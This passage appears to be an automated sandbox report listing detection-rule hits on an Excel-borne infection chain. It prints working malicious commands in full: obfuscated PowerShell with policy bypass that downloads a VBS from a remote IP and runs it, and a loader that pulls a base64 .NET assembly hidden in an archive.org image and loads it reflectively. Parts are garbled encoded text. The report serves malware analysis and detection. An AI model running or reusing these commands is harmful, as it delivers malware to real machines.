? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? 
? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3528, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3776, ProcessName: mshta.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3912, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , ProcessId: 3104, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? 
? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3912, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline", ProcessId: 4012, ProcessName: csc.exe
                  Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 88.99.66.38, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3528, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3912, TargetFilename: C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3528, Protocol: tcp, SourceIp: 88.99.66.38, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = 
[System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ?
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = 
[System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ?
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3912, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , ProcessId: 3104, ProcessName: wscript.exe
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3912, TargetFilename: C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3528, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))", CommandLine: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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
                  Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3912, TargetFilename: C:\Users\user\AppData\Local\Temp\a5lgtqgr.t5c.ps1

                  Data Obfuscation

                  Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object 